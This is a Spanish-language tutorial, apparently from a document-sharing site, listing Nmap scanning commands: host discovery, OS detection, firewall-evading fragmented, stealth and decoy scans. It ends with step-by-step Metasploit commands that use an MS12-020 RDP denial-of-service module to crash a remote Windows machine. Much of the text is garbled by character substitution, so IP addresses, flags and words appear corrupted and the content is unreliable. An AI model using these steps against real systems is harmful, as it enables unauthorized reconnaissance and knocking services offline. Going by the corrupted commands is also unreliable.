Você está na página 1de 7

Escaneo de Puertos con Nmap

Que es Nmap
Nmap es un programa de cdigo abierto que sirve para efectuar rastreo de puertos escrito originalmente por Gordon Lyon (ms conocido por su alias Fyodor as!ovic"#$ %e usa para evaluar la seguridad de sistemas informticos& as' como para descubrir servicios o servidores en una red informtica$

(onde descargarlo
Para )indo*s + Para -buntu + "ttp+,,nmap$org, .on permisos de administrador+ sudo apt/get install nmap

0ien visto la 1ntroduccion al lio$

Para ver la direccion 1P del router


En -buntu bastara con + route /n (eba2o de pasarela tendreis una 1P estilo + 345$367$3$3& 345$367$3$8 0a2o )indo*s + ipconfig,all Puerta de enlace predeterminada+ 345$367$3$3& 345$367$3$8

Para ver "osts activos en una red+


nmap /sP 345$367$3$3,59 Lo que nos mostraria los distintos dispositivos que "ay conectados

Escanear un unico "ost+


nmap 345$367$3$354

Escanear un nombre de "ost+


nmap scanme$nmap$org En esta *eb de nmap podemos probar el escaner

er mas informacion+
nmap /v 345$367$3$354

Escanear varios "osts+


nmap /v 35:$8$8$3 345$367$3$354

E;cluir un "ost+
nmap 35:$8$8$3 <e;clude 345$367$3$354

(eteccion de %istema =perativo+


nmap /= 345$367$3$354

Para ver si un "ost tiene activado el Fire*all+


nmap /s> 345$367$3$354

.omo se puede ver filtered o filtrados es que tiene el Fire*all activo

Escanear un "ost con el Fire*all activado+


nmap /f 345$367$3$354 + (ivide la cabecera ?.P en varios paquetes

.on la diferencia de que antes el puerto @@74 Aemote (es!top me mostraba -nfiltered sin filtar$ B a"ora me dice open =tra opcion es + nmap /P= 345$367$3$354 que lo que "ace es ignorar el ping antes del escaneo

Escaneo de puertos individuales+

.on la opcion+ p nmap /p 53&55&5@&5C&78&338&3@C&3@4&99@&99C 345$367$3$354

Escanear un rango de puertos+


nmap /p 3/3859 345$367$3$354

Escaneo rapido+
nmap /F 345$367$3$354

Escaneo de servicios y puertos+


nmap /s 345$367$3$354

Escaneo sigiloso+
nmap /s% 345$367$3$354

er solo los puertos abiertos+


nmap /open 345$367$3$354

Escaneo de seDuelo+
nmap /( 345$367$3$35@&345$367$3$3@8 345$367$3$354 La primera direccion 1P en llegar seria 345$367$3$35@ La segunda direccion 1P en llegar seria 345$367$3$3@8 >l final nuestro ob2etivo que es+ 345$367$3$354

B para terminar veamos como esplotar el servicio remoto del puerto @@74 Probado en )indo*s ;p sp@ y )indo*s : -ltimate
>brimos Eetasploit B buscamos+ searc" dos B elegimos este e;ploit use au;iliary,dos,*indo*s,rdp,ms35F858Fma;c"annelids

(espues s"o* options set AG=%? el "ost remoto En este caso 345$367$3$354 B e;ploit

Quedando asi Eetasploit

B asi )indo*s

Espero que os guste un saludo 9tf@

Você também pode gostar